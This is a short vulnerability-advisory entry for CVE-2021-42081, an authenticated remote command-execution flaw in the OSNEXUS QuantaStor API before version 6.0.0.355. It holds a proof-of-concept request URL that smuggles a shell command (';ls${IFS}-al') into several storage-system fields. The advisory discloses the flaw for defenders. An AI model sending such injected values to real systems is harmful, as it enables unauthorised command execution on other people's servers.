VYPR
Unrated severityNVD Advisory· Published Jul 10, 2023· Updated Sep 22, 2025

Authenticated Remote Command Execution vulnerability in OSNEXUS QuantaStor before 6.0.0.355

CVE-2021-42081

Description

An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API.

POC http://<IP_ADDRESS>/qstorapi/storageSystemModify?storageSystem=&newName=quantastor&newDescription=;ls${IFS}-al&newLocation=4&newEnclosureLayoutId=5&newDnsServerList=;ls${IFS}-al&externalHostName=&newNTPServerList=;ls${IFS}-al

Affected products

1

Patches

0

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References

4

News mentions

0

No linked articles in our index yet.